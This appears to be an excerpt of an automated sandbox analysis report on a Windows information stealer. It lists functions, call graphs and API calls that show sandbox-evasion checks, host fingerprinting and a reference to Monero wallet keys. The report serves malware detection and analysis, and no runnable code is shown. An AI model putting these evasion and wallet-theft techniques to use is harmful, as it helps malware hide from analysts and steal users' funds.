                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 98c0402f9d4f4f709cd12b2a9ce095e5608b0076690a77eab5e3f100179ce79c
                                    • Instruction ID: 27aae555c3b91f26fd89a4aa67502635c987e330fde163471fbe4782671722bf
                                    • Opcode Fuzzy Hash: 98c0402f9d4f4f709cd12b2a9ce095e5608b0076690a77eab5e3f100179ce79c
                                    • Instruction Fuzzy Hash: 966218B5501200BFC378DFA8FA8C96E37F9F78C601314A52AE60AC7E4CD6799841DB59
                                    Function 00FF5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 858 ff5510-ff5577 call ff5ad0 call ffa820 * 3 call ffa740 * 4 874 ff557c-ff5583 858->874 875 ff55d7-ff564c call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 874->875 876 ff5585-ff55b6 call ffa820 call ffa7a0 call fe1590 call ff51f0 874->876 902 ff5693-ff56a9 call ffaad0 StrCmpCA 875->902 906 ff564e-ff568e call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 875->906 891 ff55bb-ff55d2 call ffa8a0 call ffa800 876->891 891->902 907 ff56af-ff56b6 902->907 908 ff57dc-ff5844 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 902->908 906->902 910 ff56bc-ff56c3 907->910 911 ff57da-ff585f call ffaad0 StrCmpCA 907->911 1037 ff5ac3-ff5ac6 908->1037 914 ff571e-ff5793 call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 910->914 915 ff56c5-ff5719 call ffa820 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 910->915 930 ff5865-ff586c 911->930 931 ff5991-ff59f9 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 911->931 914->911 1013 ff5795-ff57d5 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 914->1013 915->911 936 ff598f-ff5a14 call ffaad0 StrCmpCA 930->936 937 ff5872-ff5879 930->937 931->1037 966 ff5a28-ff5a91 call ffa8a0 call ffa820 * 2 call fe1670 call ffa800 * 4 call ff6560 call fe1550 936->966 967 ff5a16-ff5a21 Sleep 936->967 943 ff587b-ff58ce call ffa820 call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 937->943 944 ff58d3-ff5948 call ffa740 * 2 call fe1590 call ff52c0 call ffa8a0 call ffa800 call ffaad0 StrCmpCA 937->944 943->936 944->936 1042 ff594a-ff598a call ffa7a0 call fe1590 call ff51f0 call ffa8a0 call ffa800 944->1042 966->1037 967->874 1013->911 1042->936
                                    APIs
                                      • Part of subcall function 00FFA820: lstrlen.KERNEL32(00FE4F05,?,?,00FE4F05,01000DDE), ref: 00FFA82B
                                      • Part of subcall function 00FFA820: lstrcpy.KERNEL32(01000DDE,00000000), ref: 00FFA885
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5857
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FF51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5228
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                      • Part of subcall function 00FF52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5318
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF532F
                                      • Part of subcall function 00FF52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FF5364
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF5383
                                      • Part of subcall function 00FF52C0: lstrlen.KERNEL32(00000000), ref: 00FF53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FF5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FF5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00FF5A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 3c16ceb5f87f50fc3805d9ecd70f7353765a8d3c50ae4106ec16dda41212e286
                                    • Instruction ID: e33d0a1f3761fe4050ba6d4d317c47998dc50be249866e3581c98f27d47eb00e
                                    • Opcode Fuzzy Hash: 3c16ceb5f87f50fc3805d9ecd70f7353765a8d3c50ae4106ec16dda41212e286
                                    • Instruction Fuzzy Hash: F2E166B291010CAACB14FBA0EC56EFD7378AF54340F408158F60A575A5EF786B19EB92
                                    Function 00FF17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1069 ff17a0-ff17cd call ffaad0 StrCmpCA 1072 ff17cf-ff17d1 ExitProcess 1069->1072 1073 ff17d7-ff17f1 call ffaad0 1069->1073 1077 ff17f4-ff17f8 1073->1077 1078 ff17fe-ff1811 1077->1078 1079 ff19c2-ff19cd call ffa800 1077->1079 1081 ff199e-ff19bd 1078->1081 1082 ff1817-ff181a 1078->1082 1081->1077 1084 ff187f-ff1890 StrCmpCA 1082->1084 1085 ff185d-ff186e StrCmpCA 1082->1085 1086 ff1835-ff1844 call ffa820 1082->1086 1087 ff1913-ff1924 StrCmpCA 1082->1087 1088 ff1932-ff1943 StrCmpCA 1082->1088 1089 ff18f1-ff1902 StrCmpCA 1082->1089 1090 ff1951-ff1962 StrCmpCA 1082->1090 1091 ff1970-ff1981 StrCmpCA 1082->1091 1092 ff18cf-ff18e0 StrCmpCA 1082->1092 1093 ff198f-ff1999 call ffa820 1082->1093 1094 ff18ad-ff18be StrCmpCA 1082->1094 1095 ff1849-ff1858 call ffa820 1082->1095 1096 ff1821-ff1830 call ffa820 1082->1096 1110 ff189e-ff18a1 1084->1110 1111 ff1892-ff189c 1084->1111 1108 ff187a 1085->1108 1109 ff1870-ff1873 1085->1109 1086->1081 1118 ff1926-ff1929 1087->1118 1119 ff1930 1087->1119 1097 ff194f 1088->1097 1098 ff1945-ff1948 1088->1098 1116 ff190e 1089->1116 1117 ff1904-ff1907 1089->1117 1099 ff196e 1090->1099 1100 ff1964-ff1967 1090->1100 1102 ff198d 1091->1102 1103 ff1983-ff1986 1091->1103 1114 ff18ec 1092->1114 1115 ff18e2-ff18e5 1092->1115 1093->1081 1112 ff18ca 1094->1112 1113 ff18c0-ff18c3 1094->1113 1095->1081 1096->1081 1097->1081 1098->1097 1099->1081 1100->1099 1102->1081 1103->1102 1108->1081 1109->1108 1123 ff18a8 1110->1123 1111->1123 1112->1081 1113->1112 1114->1081 1115->1114 1116->1081 1117->1116 1118->1119 1119->1081 1123->1081
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00FF17C5
                                    • ExitProcess.KERNEL32 ref: 00FF17D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: b1a3a8a4435e086401a9937e7b9bb40d06ed1f5fcb5eb422d44c9f02f1a37dd2
                                    • Instruction ID: 200ee2fb67f281830416375b6d24cda5adb1afd40cdb4acf105d9ae097ba0b2f
                                    • Opcode Fuzzy Hash: b1a3a8a4435e086401a9937e7b9bb40d06ed1f5fcb5eb422d44c9f02f1a37dd2
                                    • Instruction Fuzzy Hash: 85519EB5A0020DEFDB24DFA1D998BBE37B5BF04340F108049E606AB354D7B4D941EBA2
                                    Function 00FF7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1124 ff7500-ff754a GetWindowsDirectoryA 1125 ff754c 1124->1125 1126 ff7553-ff75c7 GetVolumeInformationA call ff8d00 * 3 1124->1126 1125->1126 1133 ff75d8-ff75df 1126->1133 1134 ff75fc-ff7617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 ff75e1-ff75fa call ff8d00 1133->1135 1137 ff7619-ff7626 call ffa740 1134->1137 1138 ff7628-ff7658 wsprintfA call ffa740 1134->1138 1135->1133 1145 ff767e-ff768e 1137->1145 1138->1145
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FF7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FF757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF760A
                                    • wsprintfA.USER32 ref: 00FF7640
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: fa95a37eeaba21fa82f77513e785e7b75f0d0c522bc3f812a55cac514b51ab44
                                    • Instruction ID: a0b23e59d89933333d65aac17b129fff5d0cd4525b77a516551aa4b35db82525
                                    • Opcode Fuzzy Hash: fa95a37eeaba21fa82f77513e785e7b75f0d0c522bc3f812a55cac514b51ab44
                                    • Instruction Fuzzy Hash: B641A3B1D0434CABDF20DF94DC45BEEBBB8AF08700F140098F609A7280DB786A44DBA5
                                    Function 00FF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800E78), ref: 00FF98A1
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D40), ref: 00FF98BA
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800E90), ref: 00FF98D2
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800ED8), ref: 00FF98EA
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800CC8), ref: 00FF9903
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01808FC0), ref: 00FF991B
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4FA0), ref: 00FF9933
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4FE0), ref: 00FF994C
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800F50), ref: 00FF9964
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800C80), ref: 00FF997C
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D10), ref: 00FF9995
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D28), ref: 00FF99AD
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,017F4F20), ref: 00FF99C5
                                      • Part of subcall function 00FF9860: GetProcAddress.KERNEL32(75900000,01800D58), ref: 00FF99DE
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FE11D0: ExitProcess.KERNEL32 ref: 00FE1211
                                      • Part of subcall function 00FE1160: GetSystemInfo.KERNEL32(?), ref: 00FE116A
                                      • Part of subcall function 00FE1160: ExitProcess.KERNEL32 ref: 00FE117E
                                      • Part of subcall function 00FE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FE112B
                                      • Part of subcall function 00FE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE1132
                                      • Part of subcall function 00FE1110: ExitProcess.KERNEL32 ref: 00FE1143
                                      • Part of subcall function 00FE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00FE123E
                                      • Part of subcall function 00FE1220: ExitProcess.KERNEL32 ref: 00FE1294
                                      • Part of subcall function 00FF6770: GetUserDefaultLangID.KERNEL32 ref: 00FF6774
                                      • Part of subcall function 00FE1190: ExitProcess.KERNEL32 ref: 00FE11C6
                                      • Part of subcall function 00FF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                      • Part of subcall function 00FF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                      • Part of subcall function 00FF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                      • Part of subcall function 00FF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                      • Part of subcall function 00FF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                      • Part of subcall function 00FF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FF6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6B1A
                                    • ExitProcess.KERNEL32 ref: 00FF6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 3dae58094a4ecfc89958adac6250ef19e0ef6ed565fb0d97ba6b58586496e28e
                                    • Instruction ID: 39b60b48af590bab5b2523eb85ade2d8ed0d714675d4fdf271401b7692e5c64c
                                    • Opcode Fuzzy Hash: 3dae58094a4ecfc89958adac6250ef19e0ef6ed565fb0d97ba6b58586496e28e
                                    • Instruction Fuzzy Hash: 053130B190020CAADB14FBF1DC56BFE7738AF44340F104528F316A65A5DFB86A05E7A6
                                    Function 00FF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1204 ff6af3 1205 ff6b0a 1204->1205 1207 ff6b0c-ff6b22 call ff6920 call ff5b10 CloseHandle ExitProcess 1205->1207 1208 ff6aba-ff6ad7 call ffaad0 OpenEventA 1205->1208 1213 ff6ad9-ff6af1 call ffaad0 CreateEventA 1208->1213 1214 ff6af5-ff6b04 CloseHandle Sleep 1208->1214 1213->1207 1214->1205
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FF6AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00FF6AF9
                                    • Sleep.KERNEL32(00001770), ref: 00FF6B04
                                    • CloseHandle.KERNEL32(?,00000000,?,01809080,?,0100110C,?,00000000,?,01001110,?,00000000,01000AEF), ref: 00FF6B1A
                                    • ExitProcess.KERNEL32 ref: 00FF6B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 114298ed504728641ba74562c2b2a538f1243eab650372b16a90dc41a15358fe
                                    • Instruction ID: b3df1ca98e9019a13e37a9a258d6e29cabf3a74dcbe60f41561f270bb3cc2d63
                                    • Opcode Fuzzy Hash: 114298ed504728641ba74562c2b2a538f1243eab650372b16a90dc41a15358fe
                                    • Instruction Fuzzy Hash: 94F03A7094020DBAEB20ABA0AC0ABBD7B34EF44701F104514F713E29A1DFF85540E656
                                    Function 00FE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
